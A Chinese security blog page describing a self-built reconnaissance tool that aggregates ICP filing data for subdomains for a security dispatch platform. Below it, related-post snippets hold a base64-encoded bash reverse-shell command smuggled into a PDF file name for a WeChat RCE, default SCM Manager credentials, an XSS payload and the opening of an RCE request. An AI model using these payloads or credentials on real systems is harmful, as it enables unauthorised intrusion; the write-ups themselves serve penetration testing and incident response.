备案归集以及数据处理并填充的工具（适配安恒指挥调度平台）

发表于2025-07-14|更新于2025-07-14|自研

|浏览量:

备案归集的工具

源码

核心功能

1. 批量域名备案信息归集

从 CSV 文件（OneForAll 输出格式）读取子域名信息
查询每个子域名的 ICP 备案信息
归集同主域名下的所有子域名、IP、端口等信息

2. 企业名称识别

备案信息优先：优先使用 ICP 备案中的企业名称
主域名备案查询：子域名无备案时，查询主域名备案

3. 系统类型简单识别

邮箱或通信系统：检测邮件、SMTP、IMAP 等关键词
门户网站：检测官网、产品、新闻等关键词
应用系统：检测 OA、ERP、CRM、登录等关键词
其他系统：无法明确分类的系统

4. 系统名称简单提取

从网页内容中提取真实的系统名称
支持从 <title>、<h1>、<h2> 等标签提取
识别系统名称关键词（如”系统”、”平台”、”管理”等）

5. 企业白名单过滤

根据企业名称列表进行匹配
支持宽松匹配（关键词匹配）
输出匹配和未匹配的结果分别保存

6. 域名存活检测

过滤无法访问的域名（状态码非200）
过滤错误页面（404、403、500等）
过滤阻断页面和DNS解析错误

7. 钉钉通知功能

任务开始、进度、完成通知
支持频率限制和重试机制
可选择性禁用通知

输出格式

匹配结果文件（自定义文件名）

1	企业名称\|系统名称\|系统类型\|子域名\|IP\|关联域名\|协议\|访问地址\|资产JSON

未匹配结果文件（not_matched_domains.txt）

1	企业名称\|系统名称\|系统类型\|子域名\|IP\|关联域名\|协议\|访问地址\|资产JSON

使用方式

1	python3 lookup.py -r <CSV文件> -c <企业名称列表> -o <输出文件> [--no-dingtalk] [--notification-interval <间隔>]

文章作者: lan1oc

文章链接: https://lan1oc.github.io/2025/07/14/%E8%AE%B0%E5%BD%95/%E8%87%AA%E7%A0%94/%E5%A4%87%E6%A1%88%E5%BD%92%E9%9B%86%E4%BB%A5%E5%8F%8A%E6%95%B0%E6%8D%AE%E5%A4%84%E7%90%86%E5%B9%B6%E5%A1%AB%E5%85%85%E7%9A%84%E5%B7%A5%E5%85%B7%EF%BC%88%E9%80%82%E9%85%8D%E5%AE%89%E6%81%92%E6%8C%87%E6%8C%A5%E8%B0%83%E5%BA%A6%E5%B9%B3%E5%8F%B0%EF%BC%89/%E5%B7%A5%E5%85%B7%E7%AE%80%E4%BB%8B/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog！

干中学牛马

相关推荐

初步接触微信小程序

小程序位置新版微信不太一样，直接everything搜Applet 1%appdata%\Tencent\xwechat\radium\Applet\packages 然后运行一个小程序，这里就会有文件夹产生，如果运行一个就产生多个文件夹就找有__APP__.wxapkg的文件夹要反编译的就是__APP__.wxapkg 测试（用fine，反编译拿敏感信息）启动被测小程序，然后就会有文件夹生成直接用fine工具，配置好路径然后他就会自动进行提取敏感信息信息泄露拿到appid和secret的利用方式接口调试工具直接获取token然后就是到运维中心操作就行

艰难的应急，但定位到了主机，找到了木马

事件背景最近在网信办驻场，大多数时候蛮闲的，基本就是搞文档，然后企业要复测，天天被骚扰麻了，就写exp给他们让他们自测，但是有安全事件就要出去应急。这不就接到一个通报，说是木马远控事件看通报文件，时间跨度是2025-09-15 12:45:12-2025-09-15...

实战——挖矿病毒应急排查(docker镜像取证与分析)

现场取证定位主机对方有奇安信的设备，直接按照外联ip查到了涉事主机主机排查，根据威胁情报比对然后查看那个主机进程 1top cpu拉满了，包是挖矿病毒了根据威胁情报显示，只有一个样本，4311文件也找到了该进程接着就是定位文件了 1lsof -c 4311 但是有报错，显示的信息都是docker相关的，然后查看了一下docker容器的资源使用情况 1docker stats 那有问题的就是这个了，停掉该容器之后，cpu占用就下来了，并且也没有4311在运行了，接着就是打包成镜像取证了导出镜像取证1docker commit dify-web-1 dify-web:20251219 1docker save -o dify-web.tar dify-web:20251219 镜像分析静态分析只读启动镜像先加载镜像 1docker load -i dify-web-backup.tar 然后启动 123456sudo docker run --rm -it \ --read-only \ --network none \ --entrypoint /bin/sh \ ...

应急响应笔记

定位主机有安全设备直接根据告警的内网ip一键定位无安全设备那通报给的ip包是公网统一出口ip，就得一台台电脑排查了排查思路查看外联，定位pid->tasklist定位进程名->找路径->删除->持久化排查查看外联，定位pid1netstat -ano | findstr ip 红框那一列就是pid tasklist定位进程名1tasklist /FI "PID eq 4992" 找路径任务管理器可以直接打开任务管理器找，在详细信息那里，找到后右键找路径命令行cmd1wmic process where name="steam.exe" get ExecutablePath 或者 1dir C:\a.exe /s /b powershell1Get-Process steam | Select-Object...

linux版微信1click rce复现，国产系统通杀

复现随便找个pdf文件，然后文件名是反引号包裹的命令，然后点击就送，尝试过麒麟和鸿蒙系统，全通杀反弹shell命名限制换linux系统用mv命令绕过了 1mv 1.pdf '`echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODg4OCAwPiYx" | base64 -d | bash`.pdf' 这是弹本地的命令

书接上回失败的shiro，成功打通，SCM Manager测试，弱口令至rce，但shiro依旧奇怪

前文shiro反序列化失败，然后没思路，就想着不死磕shiro了，从别的思路先来弱口令是个scm-manager系统，经典弱口令：scmadmin:scmadmin 存储型xsshttp://ip/scm/#repositoryPanel 1<img src=x onerror=console.log(123)> 水报告，想着多弄一个，添加代码库那边测的后台rce脚本控制台直接一把梭了 123456789101112131415161718POST /scm/api/rest/plugins/script HTTP/1.1Host: X-Requested-With: XMLHttpRequestAccept: */*Referer: /scm/index.htmlCookie: JSESSIONID=49yf5siplceo124fte79hvufjX-SCM-Client: WUIContent-Type: application/x-groovyAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0...